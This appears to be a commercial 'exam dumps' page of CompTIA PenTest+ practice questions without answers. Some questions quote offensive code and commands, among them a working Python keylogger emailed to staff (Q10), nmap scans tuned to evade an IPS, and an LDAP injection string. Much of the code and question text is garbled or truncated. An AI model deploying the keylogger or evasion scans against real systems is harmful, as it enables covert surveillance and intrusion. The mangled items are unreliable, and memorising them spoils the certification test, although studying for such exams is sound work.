Summer Sale Special Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: v4s65

PT0-002 Exam Dumps - CompTIA PenTest+ Certification Exam

Question # 4

During a security assessment, a penetration tester decides to implement a simple TCP port scanner to check the open ports from 1000 to 2000. Which of the following Python scripts would achieve this task?

A.

fori in range(1000, 2001): s = socket(AF_INET, SOCK_STREAM)

conn = s.connect_ex((host_IP, i))

if (conn == 0):

print(fPort {i} OPEN’)

B.

close ()

C.

fori in range(1001, 2000): s = socket(AF_INET, SOCK_STREAM) conn = s.connect—ex((host_IP, i)) if (conn == 0): print (f'Port {i} OPEN’) s.close ()

D.

fori in range(1000, 2001): s = socket(AF—INET, SOCK_DGRAM) conn = s.connect—ex((host_IP, i)) if (conn == 0): print(f’Port {i} OPEN’) s.close ()

E.

fori in range (1000, 2000): s = socket(SOCK_STREAM, AF_INET) conn = s.connect—ex((host—IP, i)) if (conn == 0): print (f'Port {i} OPEN') s.close()

Full Access
Question # 5

A security engineer is trying to bypass a network IPS that isolates the source when the scan exceeds 100 packets per minute. The scope of the scan is to identify web servers in the 10.0.0.0/16 subnet.

Which of the following commands should the engineer use to achieve the objective in the least amount of time?

A.

nmap -T3 -p 80 10.0.0.0/16 -- max-hostgroup 100

B.

nmap -TO -p 80 10.0.0.0/16

C.

nmap -T4 -p 80 10.0.0.0/16 -- max-rate 60

D.

nmap -T5 -p 80 10.0.0.0/16 -- min-rate 80

Full Access
Question # 6

During a security assessment, a penetration tester decides to write the following Python script: import requests

x= ['OPTIONS', 'TRACE', 'TEST'l

for y in x;

z - requests.request(y, 'http://server.net ')

print(y, z.status_code, z.reason)

Which of the following is the penetration tester trying to accomplish? (Select two).

A.

Web server denial of service

B.

HTTP methods availability

C.

'Web application firewall detection

D.

'Web server fingerprinting

E.

Web server error handling

F.

Web server banner grabbing

Full Access
Question # 7

A penetration tester is performing an assessment for an organization and must gather valid user credentials. Which of the following attacks would be best for the tester to use to achieve this objective?

A.

Wardriving

B.

Captive portal

C.

Deauthentication

D.

Impersonation

Full Access
Question # 8

During a client engagement, a penetration tester runs the following Nmap command and obtains the following output:

nmap -sV -- script ssl-enum-ciphers -p 443 remotehost

| TLS_ECDHE_ECDSA_WITH_RC4_128_SHA

| TLS_ECDHE_RSA_WITH_RC4_128_SHA

TLS_RSA_WITH_RC4_128_SHA (rsa 2048)

TLS_RSA_WITH_RC4_128_MD5 (rsa 2048)

Which of the following should the penetration tester include in the report?

A.

Old, insecure ciphers are in use.

B.

The 3DES algorithm should be deprecated.

C.

2,048-bit symmetric keys are incompatible with MD5.

D.

This server should be upgraded to TLS 1.2.

Full Access
Question # 9

Which of the following is the most important aspect to consider when calculating the price of a penetration test service for a client?

A.

Operating cost

B.

Required scope of work

C.

Non-disclosure agreement

D.

Client's budget

Full Access
Question # 10

During an assessment, a penetration tester emailed the following Python script to CompTIA's employees:

import pyHook, sys, logging, pythoncom, datetime

log_file='C:\\Windows\\Temp\\log_comptia.txt' def KbrdEvent(event):

logging.basicConfig(filename=log_file,level=logging.DEBUG, format='%(messages)s') chr(event.Ascii)

logging.log(10, chr(event.Ascii))

return True

hooks_manager = pyHook.HookManager()

hooks_manager.KeyDown = KbrdEvent

hooks_manager.HookKeyboard()

pythoncom.PumpMessages()

Which of the following is the intended effect of this script?

A.

Debugging an exploit

B.

Keylogging

C.

Collecting logs

D.

Scheduling tasks

Full Access
Question # 11

A penetration tester is conducting a test after hours and notices a critical system was taken down. Which of the following contacts should be notified first?

A.

Secondary

B.

Emergency

C.

Technical

D.

Primary

Full Access
Question # 12

During a client engagement, a penetration tester runs the following Nmap command and obtains the following output:

nmap -sV -- script ssl-enum-ciphers -p 443 remotehost

| TLS_ECDHE_ECDSA_WITH_RC4_128_SHA

| TLS_ECDHE_RSA_WITH_RC4_128_SHA

| TLS_RSA_WITH_RC4_128_SHA (rsa 2048)

TLS_RSA_WITH_RC4_128_MD5 (rsa 2048)

Which of the following should the penetration tester include in the report?

A.

Old, insecure ciphers are in use.

B.

The 3DES algorithm should be deprecated.

C.

2,048-bit symmetric keys are incompatible with MD5.

D.

This server should be upgraded to TLS 1.2.

Full Access
Question # 13

A penetration tester is performing an assessment for an application that is used by large organizations operating in the heavily regulated financial services industry. The penetration tester observes that the default Admin User account is enabled and appears to be used several times a day by unfamiliar IP addresses. Which of the following is the most appropriate way to remediate this issue?

A.

Increase password complexity.

B.

Implement system hardening.

C.

Restrict simultaneous user log-ins.

D.

Require local network access.

Full Access
Question # 14

A penetration tester is performing a vulnerability scan on a large ATM network. One of the organization's requirements is that the scan does not affect legitimate clients' usage of the ATMs. Which of the following should the tester do to best meet the company's vulnerability scan requirements?

A.

Use Nmap's -T2 switch to run a slower scan and with less resources.

B.

Run the scans using multiple machines.

C.

Run the scans only during lunch hours.

D.

Use Nmap's -host-timeout switch to skip unresponsive targets.

Full Access
Question # 15

A penetration tester wants to accomplish ARP poisoning as part of an attack. Which of the following tools will the tester most likely utilize?

A.

Wireshark

B.

Netcat

C.

Nmap

D.

Ettercap

Full Access
Question # 16

Which of the following describes a globally accessible knowledge base of adversary tactics and techniques based on real-world observations?

A.

OWASP Top 10

B.

MITRE ATT&CK

C.

Cyber Kill Chain

D.

Well-Architected Framework

Full Access
Question # 17

During an assessment, a penetration tester discovers the following code sample in a web application:

"(&(userid=*)(userid=*))(I(userid=*)(userPwd=(SHAl}a9993e364706816aba3e25717850c26c9cd0d89d==))

Which of the following injections is being performed?

A.

Boolean SQL

B.

Command

C.

Blind SQL

D.

LDAP

Full Access
Question # 18

A penetration tester approaches a company employee in the smoking area and starts a conversation about the company's recent social event. After a few minutes, the employee holds the badge-protected door open for the penetration tester and both enter the company's building. Which of the following attacks did the penetration tester perform?

A.

Dumpster diving

B.

Phishing

C.

Badge cloning

D.

Tailgating

Full Access
Question # 19

Which of the following tools would be the best to use to intercept an HTTP response of an API, change its content, and forward it back to the origin mobile device?

A.

Drozer

B.

Burp Suite

C.

Android SDK Tools

D.

MobSF

Full Access
Question # 20

In Java and C/C++, variable initialization is critical because:

A.

the unknown value, when used later, will cause unexpected behavior.

B.

the compiler will assign null to the variable, which will cause warnings and errors.

C.

the initial state of the variable creates a race condition.

D.

the variable will not have an object type assigned to it.

Full Access
Question # 21

A security analyst is conducting an unknown environment test from 192.168 3.3. The analyst wants to limit observation of the penetration tester's activities and lower the probability of detection by intrusion protection and detection systems. Which of the following Nmap commands should the analyst use to achieve This objective?

A.

Nmap –F 192.168.5.5

B.

Map –datalength 2.192.168.5.5

C.

Nmap –D 10.5.2.2.168.5.5

D.

Map –scanflags SYNFIN 192.168.5.5

Full Access
Question # 22

Penetration on an assessment for a client organization, a penetration tester notices numerous outdated software package versions were installed ...s-critical servers. Which of the following would best mitigate this issue?

A.

Implementation of patching and change control programs

B.

Revision of client scripts used to perform system updates

C.

Remedial training for the client's systems administrators

D.

Refrainment from patching systems until quality assurance approves

Full Access
Question # 23

A penetration tester is working to enumerate the PLC devices on the 10.88.88.76/24 network. Which of the following commands should the tester use to achieve the objective in a way that minimizes the risk of affecting the PLCs?

A.

nmap —script=s7-info -p 102 10.88.88.76/24 -T3

B.

nmap —script=wsdd-discover -p 3702 -sUlO.88.88.76/24

C.

nmap --script=iax2-version -p 4569 -sU -V 10.88.88.76/24 -T2

D.

nmap --script=xll-access -p 6000-6009 10.88.88.76/24

Full Access
Question # 24

An executive needs to use Wi-Fi to connect to the company's server while traveling. While looking for available Wi-Fi connections, the executive notices an available access point to a hotel chain that is not available where the executive is staying. Which of the following attacks is the executive most likely experiencing?

A.

Data modification

B.

Amplification

C.

Captive portal

D.

Evil twin

Full Access
Question # 25

A penetration tester is conducting an assessment of an organization that has both a web and mobile application. While testing the user profile page, the penetration tester notices that additional data is returned in the API response, which is not displayed in the web user interface. Which of the following is the most effective technique to extract sensitive user data?

A.

Compare PI I from data leaks to publicly exposed user profiles.

B.

Target the user profile page with a denial-of-service attack.

C.

Target the user profile page with a reflected XSS attack.

D.

Compare the API response fields to GUI fields looking for PH.

Full Access
Question # 26

A penetration tester runs the following command:

nmap -p- -A 10.0.1.10

Given the execution of this command, which of the following quantities of ports will Nmap scan?

A.

1,000

B.

1,024

C.

10,000

D.

65,535

Full Access
Question # 27

Which of the following types of information would most likely be included in an application security assessment report addressed to developers? (Select two).

A.

Use of non-optimized sort functions

B.

Poor input sanitization

C.

Null pointer dereferences

D.

Non-compliance with code style guide

E.

Use of deprecated Javadoc tags

F.

A cyclomatic complexity score of 3

Full Access
Question # 28

A penetration tester is looking for a particular type of service and obtains the output below:

I Target is synchronized with 127.127.38.0 (reference clock)

I Alternative Target Interfaces:

I 10.17.4.20

I Private Servers (0)

I Public Servers (0)

I Private Peers (0)

I Public Peers (0)

I Private Clients (2)

I 10.20.8.69 169.254.138.63

I Public Clients (597)

I 4.79.17.248 68.70.72.194 74.247.37.194 99.190.119.152

I 12.10.160.20 68.80.36.133 75.1.39.42 108.7.58.118

I 68.56.205.98

I 2001:1400:0:0:0:0:0:1 2001:16d8:ddOO:38:0:0:0:2

I 2002:db5a:bccd:l:21d:e0ff:feb7:b96f 2002:b6ef:81c4:0:0:1145:59c5:3682

I Other Associations (1)

|_ 127.0.0.1 seen 1949869 times, last tx was unicast v2 mode 7

Which of the following commands was executed by the tester?

A.

nmap-sU-pU:517-Pn-n—script=supermicro-ipmi-config

B.

nmap-sU-pU:123-Pn-n—script=ntp-monlist

C.

nmap-sU-pU:161-Pn-n—script«voldemort-info

D.

nmap-sU-pU:37 -Pn -n —script=icap-info

Full Access
Question # 29

An external consulting firm is hired to perform a penetration test and must keep the confidentiality of the security vulnerabilities and the private data found in a customer's systems. Which of the following documents addresses this requirement?

A.

ROE

B.

NDA

C.

MOU

D.

SLA

Full Access
Question # 30

A penetration tester was hired to test Wi-Fi equipment. Which of the following tools should be used to gather information about the wireless network?

A.

Kismet

B.

Burp Suite

C.

BeEF

D.

WHOIS

Full Access
Question # 31

Penetration tester has discovered an unknown Linux 64-bit executable binary. Which of the following tools would be BEST to use to analyze this issue?

A.

Peach

B.

WinDbg

C.

GDB

D.

OllyDbg

Full Access
Question # 32

A penetration tester is conducting an authorized, physical penetration test to attempt to enter a client's building during non-business hours. Which of the following are MOST important for the penetration tester to have during the test? (Choose two.)

A.

A handheld RF spectrum analyzer

B.

A mask and personal protective equipment

C.

Caution tape for marking off insecure areas

D.

A dedicated point of contact at the client

E.

The paperwork documenting the engagement

F.

Knowledge of the building's normal business hours

Full Access
Question # 33

Given the following code:

$p = (80, 110, 25)

$network = (192.168.0)

$range = 1 .. 254

$ErrorActionPreference = 'silentlycontinue'

$Foreach ($add in $range)

$Foreach ($x in $p)

{ {$ip = "{0} . {1} -F $network, $add"

If (Test-Connection -BufferSize 32 -Count 1 -quiet -ComputerName $ip)

{$socket = new-object System.Net. Sockets. TcpClient (&ip, $x)

If ($socket. Connected) { $ip $p open"

$socket. Close () }

}

}}

Which of the following tasks could be accomplished with the script?

A.

Reverse shell

B.

Ping sweep

C.

File download

D.

Port scan

Full Access
Question # 34

Which of the following is the most secure method for sending the penetration test report to the client?

A.

Sending the penetration test report on an online storage system.

B.

Sending the penetration test report inside a password-protected ZIP file.

C.

Sending the penetration test report via webmail using an HTTPS connection.

D.

Encrypting the penetration test report with the client’s public key and sending it via email.

Full Access
Question # 35

During a penetration tester found a web component with no authentication requirements. The web component also allows file uploads and is hosted on one of the target public web the following actions should the penetration tester perform next?

A.

Continue the assessment and mark the finding as critical.

B.

Attempting to remediate the issue temporally.

C.

Notify the primary contact immediately.

D.

Shutting down the web server until the assessment is finished

Full Access
Question # 36

A penetration tester was able to compromise a web server and move laterally into a Linux web server. The tester now wants to determine the identity of the last user who signed in to the web server. Which of the following log files will show this activity?

A.

/var/log/messages

B.

/var/log/last_user

C.

/var/log/user_log

D.

/var/log/lastlog

Full Access
Question # 37

A penetration tester learned that when users request password resets, help desk analysts change users' passwords to 123change. The penetration tester decides to brute force an internet-facing webmail to check which users are still using the temporary password. The tester configures the brute-force tool to test usernames found on a text file and the... Which of the following techniques is the penetration tester using?

A.

Password brute force attack

B.

SQL injection

C.

Password spraying

D.

Kerberoasting

Full Access
Question # 38

During a penetration test, the domain names, IP ranges, hosts, and applications are defined in the:

A.

SOW.

B.

SLA.

C.

ROE.

D.

NDA

Full Access
Question # 39

A penetration tester has extracted password hashes from the lsass.exe memory process. Which of the following should the tester perform NEXT to pass the hash and provide persistence with the newly acquired credentials?

A.

Use Patator to pass the hash and Responder for persistence.

B.

Use Hashcat to pass the hash and Empire for persistence.

C.

Use a bind shell to pass the hash and WMI for persistence.

D.

Use Mimikatz to pass the hash and PsExec for persistence.

Full Access
Question # 40

During a penetration test, a tester is in close proximity to a corporate mobile device belonging to a network administrator that is broadcasting Bluetooth frames.

Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform?

A.

Sniff and then crack the WPS PIN on an associated WiFi device.

B.

Dump the user address book on the device.

C.

Break a connection between two Bluetooth devices.

D.

Transmit text messages to the device.

Full Access
Question # 41

A penetration tester gains access to a web server and notices a large number of devices in the system ARP table. Upon scanning the web server, the tester determines that many of the devices are user ...ch of the following should be included in the recommendations for remediation?

A.

training program on proper access to the web server

B.

patch-management program for the web server.

C.

the web server in a screened subnet

D.

Implement endpoint  protection on the workstations

Full Access
Question # 42

A penetration tester discovered that a client uses cloud mail as the company's email system. During the penetration test, the tester set up a fake cloud mail login page and sent all company employees an email that stated their inboxes were full and directed them to the fake login page to remedy the issue. Which of the following BEST describes this attack?

A.

Credential harvesting

B.

Privilege escalation

C.

Password spraying

D.

Domain record abuse

Full Access
Question # 43

A penetration tester was able to compromise a server and escalate privileges. Which of the following should the tester perform AFTER concluding the activities on the specified target? (Choose two.)

A.

Remove the logs from the server.

B.

Restore the server backup.

C.

Disable the running services.

D.

Remove any tools or scripts that were installed.

E.

Delete any created credentials.

F.

Reboot the target server.

Full Access
Question # 44

A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as permitted by the ROE. The tester noticed the client's data included PII, which is out of scope, and immediately stopped the transfer. Which of the following MOST likely explains the penetration tester's decision?

A.

The tester had the situational awareness to stop the transfer.

B.

The tester found evidence of prior compromise within the data set.

C.

The tester completed the assigned part of the assessment workflow.

D.

The tester reached the end of the assessment time frame.

Full Access
Question # 45

A penetration tester uncovers access keys within an organization's source code management solution. Which of the following would BEST address the issue? (Choose two.)

A.

Setting up a secret management solution for all items in the source code management system

B.

Implementing role-based access control on the source code management system

C.

Configuring multifactor authentication on the source code management system

D.

Leveraging a solution to scan for other similar instances in the source code management system

E.

Developing a secure software development life cycle process for committing code to the source code management system

F.

Creating a trigger that will prevent developers from including passwords in the source code management system

Full Access
Question # 46

A penetration tester is testing a new version of a mobile application in a sandbox environment. To intercept and decrypt the traffic between the application and the external API, the tester has created a private root CA and issued a certificate from it. Even though the tester installed the root CA into the trusted stone of the smartphone used for the tests, the application shows an error indicating a certificate mismatch and does not connect to the server. Which of the following is the MOST likely reason for the error?

A.

TCP port 443 is not open on the firewall

B.

The API server is using SSL instead of TLS

C.

The tester is using an outdated version of the application

D.

The application has the API certificate pinned.

Full Access
Question # 47

A penetration tester receives the following results from an Nmap scan:

Which of the following OSs is the target MOST likely running?

A.

CentOS

B.

Arch Linux

C.

Windows Server

D.

Ubuntu

Full Access
Question # 48

A final penetration test report has been submitted to the board for review and accepted. The report has three findings rated high. Which of the following should be the NEXT step?

A.

Perform a new penetration test.

B.

Remediate the findings.

C.

Provide the list of common vulnerabilities and exposures.

D.

Broaden the scope of the penetration test.

Full Access
Question # 49

A penetration tester is conducting an Nmap scan and wants to scan for ports without establishing a connection. The tester also wants to find version data information for services running on Projects. Which of the following Nmap commands should the tester use?

A.

..nmap -sU -sV -T4 -F target.company.com

B.

..nmap -sS -sV -F target.company.com

C.

..nmap -sT -v -T5 target.company.com

D.

..nmap -sX -sC target.company.com

Full Access
Question # 50

Which of the following is the BEST resource for obtaining payloads against specific network infrastructure products?

A.

Exploit-DB

B.

Metasploit

C.

Shodan

D.

Retina

Full Access
Question # 51

Which of the following BEST explains why a penetration tester cannot scan a server that was previously scanned successfully?

A.

The IP address is wrong.

B.

The server is unreachable.

C.

The IP address is on the blocklist.

D.

The IP address is on the allow list.

Full Access
Question # 52

A penetration tester is conducting an unknown environment test and gathering additional information that can be used for later stages of an assessment. Which of the following would most likely produce useful information for additional testing?

A.

Searching for code repositories associated with a developer who previously worked for the target company code repositories associated with the

B.

Searching for code repositories target company's organization

C.

Searching for code repositories associated with the target company's organization

D.

Searching for code repositories associated with a developer who previously worked for the target company

Full Access
Question # 53

During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the target company's website and then creates a list of possible usernames based on the email address format. Which of the following types of attacks would MOST likely be used to avoid account lockout?

A.

Mask

B.

Rainbow

C.

Dictionary

D.

Password spraying

Full Access
Question # 54

The following output is from reconnaissance on a public-facing banking website:

Based on these results, which of the following attacks is MOST likely to succeed?

A.

A birthday attack on 64-bit ciphers (Sweet32)

B.

An attack that breaks RC4 encryption

C.

An attack on a session ticket extension (Ticketbleed)

D.

A Heartbleed attack

Full Access
Question # 55

A penetration tester is conducting an engagement against an internet-facing web application and planning a phishing campaign. Which of the following is the BEST passive method of obtaining the technical contacts for the website?

A.

WHOIS domain lookup

B.

Job listing and recruitment ads

C.

SSL certificate information

D.

Public data breach dumps

Full Access
Question # 56

Which of the following situations would MOST likely warrant revalidation of a previous security assessment?

A.

After detection of a breach

B.

After a merger or an acquisition

C.

When an organization updates its network firewall configurations

D.

When most of the vulnerabilities have been remediated

Full Access
Question # 57

A company uses a cloud provider with shared network bandwidth to host a web application on dedicated servers. The company's contact with the cloud provider prevents any activities that would interfere with the cloud provider's other customers. When engaging with a penetration-testing company to test the application, which of the following should the company avoid?

A.

Crawling the web application's URLs looking for vulnerabilities

B.

Fingerprinting all the IP addresses of the application's servers

C.

Brute forcing the application's passwords

D.

Sending many web requests per second to test DDoS protection

Full Access
Question # 58

During the reconnaissance phase, a penetration tester obtains the following output:

Reply from 192.168.1.23: bytes=32 time<54ms TTL=128

Reply from 192.168.1.23: bytes=32 time<53ms TTL=128

Reply from 192.168.1.23: bytes=32 time<60ms TTL=128

Reply from 192.168.1.23: bytes=32 time<51ms TTL=128

Which of the following operating systems is MOST likely installed on the host?

A.

Linux

B.

NetBSD

C.

Windows

D.

macOS

Full Access
Question # 59

A penetration tester wrote the following comment in the final report: "Eighty-five percent of the systems tested were found to be prone to unauthorized access from the internet." Which of the following audiences was this message intended?

A.

Systems administrators

B.

C-suite executives

C.

Data privacy ombudsman

D.

Regulatory officials

Full Access
Question # 60

A penetration tester has been hired to examine a website for flaws. During one of the time windows for testing, a network engineer notices a flood of GET requests to the web server, reducing the website’s response time by 80%. The network engineer contacts the penetration tester to determine if these GET requests are part of the test. Which of the following BEST describes the purpose of checking with the penetration tester?

A.

Situational awareness

B.

Rescheduling

C.

DDoS defense

D.

Deconfliction

Full Access
Question # 61

Which of the following concepts defines the specific set of steps and approaches that are conducted during a penetration test?

A.

Scope details

B.

Findings

C.

Methodology

D.

Statement of work

Full Access
Question # 62

A client evaluating a penetration testing company requests examples of its work. Which of the following represents the BEST course of action for the penetration testers?

A.

Redact identifying information and provide a previous customer's documentation.

B.

Allow the client to only view the information while in secure spaces.

C.

Determine which reports are no longer under a period of confidentiality.

D.

Provide raw output from penetration testing tools.

Full Access
Question # 63

An exploit developer is coding a script that submits a very large number of small requests to a web server until the server is compromised. The script must examine each response received and compare the data to a large number of strings to determine which data to submit next. Which of the following data structures should the exploit developer use to make the string comparison and determination as efficient as possible?

A.

A list

B.

A tree

C.

A dictionary

D.

An array

Full Access
Question # 64

A penetration tester joins the assessment team in the middle of the assessment. The client has asked the team, both verbally and in the scoping document, not to test the production networks. However, the new tester is not aware of this request and proceeds to perform exploits in the production environment. Which of the following would have MOST effectively prevented this misunderstanding?

A.

Prohibiting exploitation in the production environment

B.

Requiring all testers to review the scoping document carefully

C.

Never assessing the production networks

D.

Prohibiting testers from joining the team during the assessment

Full Access
Question # 65

After compromising a system, a penetration tester wants more information in order to decide what actions to take next. The tester runs the following commands:

Which of the following attacks is the penetration tester most likely trying to perform?

A.

Metadata service attack

B.

Container escape techniques

C.

Credential harvesting

D.

Resource exhaustion

Full Access
Question # 66

An Nmap scan of a network switch reveals the following:

Which of the following technical controls will most likely be the FIRST recommendation for this device?

A.

Encrypted passwords

B.

System-hardening techniques

C.

Multifactor authentication

D.

Network segmentation

Full Access
Question # 67

During an assessment, a penetration tester was able to access the organization's wireless network from outside of the building using a laptop running Aircrack-ng. Which of the following should be recommended to the client to remediate this issue?

A.

Changing to Wi-Fi equipment that supports strong encryption

B.

Using directional antennae

C.

Using WEP encryption

D.

Disabling Wi-Fi

Full Access
Question # 68

A company recently moved its software development architecture from VMs to containers. The company has asked a penetration tester to determine if the new containers are configured correctly against a DDoS attack. Which of the following should a tester perform first?

A.

Test the strength of the encryption settings.

B.

Determine if security tokens are easily available.

C.

Perform a vulnerability check against the hypervisor.

D.

.Scan the containers for open ports.

Full Access
Question # 69

Which of the following tools would BEST allow a penetration tester to capture wireless handshakes to reveal a Wi-Fi password from a Windows machine?

A.

Wireshark

B.

EAPHammer

C.

Kismet

D.

Aircrack-ng

Full Access
Question # 70

The provision that defines the level of responsibility between the penetration tester and the client for preventing unauthorized disclosure is found in the:

A.

NDA

B.

SLA

C.

MSA

D.

SOW

Full Access
Question # 71

PCI DSS requires which of the following as part of the penetration-testing process?

A.

The penetration tester must have cybersecurity certifications.

B.

The network must be segmented.

C.

Only externally facing systems should be tested.

D.

The assessment must be performed during non-working hours.

Full Access
Question # 72

A software development team is concerned that a new product's 64-bit Windows binaries can be deconstructed to the underlying code. Which of the following tools can a penetration tester utilize to help the team gauge what an attacker might see in the binaries?

A.

Immunity Debugger

B.

OllyDbg

C.

GDB

D.

Drozer

Full Access
Question # 73

A penetration tester who is working remotely is conducting a penetration test using a wireless connection. Which of the following is the BEST way to provide confidentiality for the client while using this connection?

A.

Configure wireless access to use a AAA server.

B.

Use random MAC addresses on the penetration testing distribution.

C.

Install a host-based firewall on the penetration testing distribution.

D.

Connect to the penetration testing company's VPS using a VPN.

Full Access
Question # 74

A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server.

Which of the following can be done with the pcap to gain access to the server?

A.

Perform vertical privilege escalation.

B.

Replay the captured traffic to the server to recreate the session.

C.

Use John the Ripper to crack the password.

D.

Utilize a pass-the-hash attack.

Full Access
Question # 75

A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following tools will help the tester prepare an attack for this scenario?

A.

Hydra and crunch

B.

Netcat and cURL

C.

Burp Suite and DIRB

D.

Nmap and OWASP ZAP

Full Access
Question # 76

A penetration tester has found indicators that a privileged user's password might be the same on 30 different Linux systems. Which of the following tools can help the tester identify the number of systems on which the password can be used?

A.

Hydra

B.

John the Ripper

C.

Cain and Abel

D.

Medusa

Full Access
Question # 77

A consultant just performed a SYN scan of all the open ports on a remote host and now needs to remotely identify the type of services that are running on the host. Which of the following is an active reconnaissance tool that would be BEST to use to accomplish this task?

A.

tcpdump

B.

Snort

C.

Nmap

D.

Netstat

E.

Fuzzer

Full Access
Question # 78

Which of the following is the MOST effective person to validate results from a penetration test?

A.

Third party

B.

Team leader

C.

Chief Information Officer

D.

Client

Full Access
Question # 79

A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?

A.

Wait for the next login and perform a downgrade attack on the server.

B.

Capture traffic using Wireshark.

C.

Perform a brute-force attack over the server.

D.

Use an FTP exploit against the server.

Full Access
Question # 80

A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?

A.

A signed statement of work

B.

The correct user accounts and associated passwords

C.

The expected time frame of the assessment

D.

The proper emergency contacts for the client

Full Access
Question # 81

A large client wants a penetration tester to scan for devices within its network that are Internet facing. The client is specifically looking for Cisco devices with no authentication requirements. Which of the following settings in Shodan would meet the client’s requirements?

A.

“cisco-ios” “admin+1234”

B.

“cisco-ios” “no-password”

C.

“cisco-ios” “default-passwords”

D.

“cisco-ios” “last-modified”

Full Access
Question # 82

Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in?

A.

HTTPS communication

B.

Public and private keys

C.

Password encryption

D.

Sessions and cookies

Full Access
Question # 83

In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company’s servers. Which of the following actions would BEST enable the tester to perform

phishing in a later stage of the assessment?

A.

Test for RFC-defined protocol conformance.

B.

Attempt to brute force authentication to the service.

C.

Perform a reverse DNS query and match to the service banner.

D.

Check for an open relay configuration.

Full Access
Question # 84

Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?

A.

chmod u+x script.sh

B.

chmod u+e script.sh

C.

chmod o+e script.sh

D.

chmod o+x script.sh

Full Access
Question # 85

A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test.

Which of the following describes the scope of the assessment?

A.

Partially known environment testing

B.

Known environment testing

C.

Unknown environment testing

D.

Physical environment testing

Full Access
Question # 86

Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?

A.

S/MIME

B.

FTPS

C.

DNSSEC

D.

AS2

Full Access
Question # 87

Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?

A.

NDA

B.

MSA

C.

SOW

D.

MOU

Full Access
Question # 88

A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client’s building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet.

Which of the following tools or techniques would BEST support additional reconnaissance?

A.

Wardriving

B.

Shodan

C.

Recon-ng

D.

Aircrack-ng

Full Access
Question # 89

A penetration tester is exploring a client’s website. The tester performs a curl command and obtains the following:

* Connected to 10.2.11.144 (::1) port 80 (#0)

> GET /readmine.html HTTP/1.1

> Host: 10.2.11.144

> User-Agent: curl/7.67.0

> Accept: */*

>

* Mark bundle as not supporting multiuse

< HTTP/1.1 200

< Date: Tue, 02 Feb 2021 21:46:47 GMT

< Server: Apache/2.4.41 (Debian)

< Content-Length: 317

< Content-Type: text/html; charset=iso-8859-1

<

WordPress › ReadMe

Which of the following tools would be BEST for the penetration tester to use to explore this site further?

A.

Burp Suite

B.

DirBuster

C.

WPScan

D.

OWASP ZAP

Full Access
Question # 90

A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?

A.

Aircrack-ng

B.

Wireshark

C.

Wifite

D.

Kismet

Full Access
Question # 91

A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company’s employees.

Which of the following tools can help the tester achieve this goal?

A.

Metasploit

B.

Hydra

C.

SET

D.

WPScan

Full Access
Question # 92

Which of the following types of information would MOST likely be included in an application security assessment report addressed to developers? (Choose two.)

A.

Use of non-optimized sort functions

B.

Poor input sanitization

C.

Null pointer dereferences

D.

Non-compliance with code style guide

E.

Use of deprecated Javadoc tags

F.

A cydomatic complexity score of 3

Full Access
Question # 93

A consulting company is completing the ROE during scoping.

Which of the following should be included in the ROE?

A.

Cost ofthe assessment

B.

Report distribution

C.

Testing restrictions

D.

Liability

Full Access
Question # 94

A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?

A.

Add a dependency checker into the tool chain.

B.

Perform routine static and dynamic analysis of committed code.

C.

Validate API security settings before deployment.

D.

Perform fuzz testing of compiled binaries.

Full Access
Question # 95

A penetration tester has gained access to part of an internal network and wants to exploit on a different network segment. Using Scapy, the tester runs the following command:

Which of the following represents what the penetration tester is attempting to accomplish?

A.

DNS cache poisoning

B.

MAC spoofing

C.

ARP poisoning

D.

Double-tagging attack

Full Access
Question # 96

A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:

  • Have a full TCP connection
  • Send a “hello” payload
  • Walt for a response
  • Send a string of characters longer than 16 bytes

Which of the following approaches would BEST support the objective?

A.

Run nmap –Pn –sV –script vuln .

B.

Employ an OpenVAS simple scan against the TCP port of the host.

C.

Create a script in the Lua language and use it with NSE.

D.

Perform a credentialed scan with Nessus.

Full Access
Question # 97

A penetration tester obtained the following results after scanning a web server using the dirb utility:

...

GENERATED WORDS: 4612

---- Scanning URL: http://10.2.10.13/ ----

+ http://10.2.10.13/about (CODE:200|SIZE:1520)

+ http://10.2.10.13/home.html (CODE:200|SIZE:214)

+ http://10.2.10.13/index.html (CODE:200|SIZE:214)

+ http://10.2.10.13/info (CODE:200|SIZE:214)

...

DOWNLOADED: 4612 – FOUND: 4

Which of the following elements is MOST likely to contain useful information for the penetration tester?

A.

index.html

B.

about

C.

info

D.

home.html

Full Access
Question # 98

A penetration tester is reviewing the following DNS reconnaissance results for comptia.org from dig:

comptia.org. 3569 IN MX comptia.org-mail.protection.outlook.com. comptia.org. 3569 IN A 3.219.13.186. comptia.org.

3569 IN NS ns1.comptia.org. comptia.org. 3569 IN SOA haven. administrator.comptia.org. comptia.org. 3569 IN MX new.mx0.comptia.org. comptia.org. 3569 IN MX new.mx1.comptia.org.

Which of the following potential issues can the penetration tester identify based on this output?

A.

At least one of the records is out of scope.

B.

There is a duplicate MX record.

C.

The NS record is not within the appropriate domain.

D.

The SOA records outside the comptia.org domain.

Full Access
Question # 99

